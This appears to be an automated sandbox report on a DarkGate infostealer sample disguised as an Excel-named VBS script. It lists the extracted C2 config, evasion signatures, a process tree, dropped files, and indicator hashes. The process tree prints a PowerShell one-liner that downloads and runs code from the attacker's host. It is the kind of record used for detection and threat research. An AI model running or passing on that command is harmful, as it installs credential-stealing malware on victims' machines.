Overview

overview

10

Static

static

1

EXCEL_DOCU...EN.vbs

windows7-x64

3

EXCEL_DOCU...EN.vbs

windows10-1703-x64

10

EXCEL_DOCU...EN.vbs

windows10-2004-x64

10

Resubmissions

12-08-2024 11:41

240812-ntgelazapr 8

08-05-2024 15:00

240508-sdtr7sab2w 8

05-04-2024 15:07

240405-shpdaafc3v 10

04-04-2024 20:19

240404-y3t26aaa37 10

Analysis

  • max time kernel
    239s
  • max time network
    299s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-04-2024 20:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    EXCEL_DOCUMENT_OPEN.vbs

  • Size

    23KB

  • MD5

    6925ed4c3665b27592c356b0bbd4948d

  • SHA1

    7429a3929f68c87af85266c5d304f3e26e11a8c0

  • SHA256

    5237e653da5478c91e1de3d51a9713753b4bc1b4c9be8e9136cd9d94e216ae77

  • SHA512

    333ffd943ea86e75822f6c59412fe12b77f95ddeffd1f0286606faab19b595b27b528457158cc6afe2dcb75455ce9e1fb012ddf171f895135fc90e9d249599b6

  • SSDEEP

    384:J0Y5Y65Go4F0yNWe037NwNAUihUN+0X2RyiUiK3xYUif3JNB6Bcy:hYFFFNWe037NwNAUiKNIRyiUiK3xYUi2

Score
10/10
darkgateadmin888stealer

Malware Config

Extracted

Family

darkgate

Botnet

admin888

C2

irreceiver.com

Attributes
  • anti_analysis

    true

  • anti_debug

    false

  • anti_vm

    true

  • c2_port

    80

  • check_disk

    false

  • check_ram

    false

  • check_xeon

    false

  • crypter_au3

    false

  • crypter_dll

    false

  • crypter_raw_stub

    false

  • internal_mutex

    AdRDIQXg

  • minimum_disk

    50

  • minimum_ram

    4000

  • ping_interval

    6

  • rootkit

    false

  • startup_persistence

    true

  • username

    admin888

Signatures

  • DarkGate

    DarkGate is an infostealer written in C++.

    stealerdarkgate
  • Detect DarkGate stealer 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\EXCEL_DOCUMENT_OPEN.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3844
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'irreceiver.com/lcyqeksm')
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2392
      • C:\roef\AutoHotkey.exe
        "C:\roef\AutoHotkey.exe" C:/roef/script.ahk
        3⤵
        • Executes dropped EXE
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:4780
      • C:\Windows\system32\attrib.exe
        "C:\Windows\system32\attrib.exe" +h C:/roef/
        3⤵
        • Views/modifies file attributes
        PID:4412
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4100 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8
    1⤵
      PID:3724

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wgbvf10v.sea.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\roef\AutoHotkey.exe
      Filesize

      892KB

      MD5

      a59a2d3e5dda7aca6ec879263aa42fd3

      SHA1

      312d496ec90eb30d5319307d47bfef602b6b8c6c

      SHA256

      897b0d0e64cf87ac7086241c86f757f3c94d6826f949a1f0fec9c40892c0cecb

      SHA512

      852972ca4d7f9141ea56d3498388c61610492d36ea7d7af1b36d192d7e04dd6d9bc5830e0dcb0a5f8f55350d4d8aaac2869477686b03f998affbac6321a22030

      Download Submit

    • C:\roef\script.ahk
      Filesize

      441B

      MD5

      77f2459d628fb37ef971846326b498a8

      SHA1

      3baefa06af304c7db531bbebe2c285d16ee0b337

      SHA256

      413ca585a9217847287dd01d836d7c3a866729016bc9cb2eb6296d28bac5b937

      SHA512

      869c5c790c0f8f8626784d3209f40fe731a7886a3a9e1e834f8d2380fb9dfa2874fded5120f12b92beeab4d413c579cc8512b4660b2a905574adaa43557b5f01

      Download Submit

    • C:\roef\test.txt
      Filesize

      924KB

      MD5

      63b3d0aa63886a380b08354f9aa42571

      SHA1

      163f4c68cc88d5738728100f922e19d595ae1623

      SHA256

      41472438e798bf94a68600f1519552a30c2eeb4b352549ab57e2351d89271a2b

      SHA512

      8632654b064579a0e76d088571094daaaf930c06dcf8080ee04a9fb393e8d0ffc4cae7ad35cf757b5f817dabad03a37869d873be0784a2af5ca719c85861b54f

      Download Submit

    • memory/2392-11-0x000001893CEE0000-0x000001893CEF0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2392-13-0x00000189579A0000-0x0000018957B62000-memory.dmp

      Filesize

      1.8MB

      Download

    • memory/2392-14-0x00007FFB76D20000-0x00007FFB777E1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2392-15-0x000001893CEE0000-0x000001893CEF0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2392-16-0x000001893CEE0000-0x000001893CEF0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2392-12-0x000001893CEE0000-0x000001893CEF0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/2392-34-0x00007FFB76D20000-0x00007FFB777E1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2392-0-0x0000018957280000-0x00000189572A2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2392-10-0x00007FFB76D20000-0x00007FFB777E1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4780-37-0x0000000004B50000-0x0000000004BC4000-memory.dmp

      Filesize

      464KB

      Download

    • memory/4780-39-0x0000000004B50000-0x0000000004BC4000-memory.dmp

      Filesize

      464KB

      Download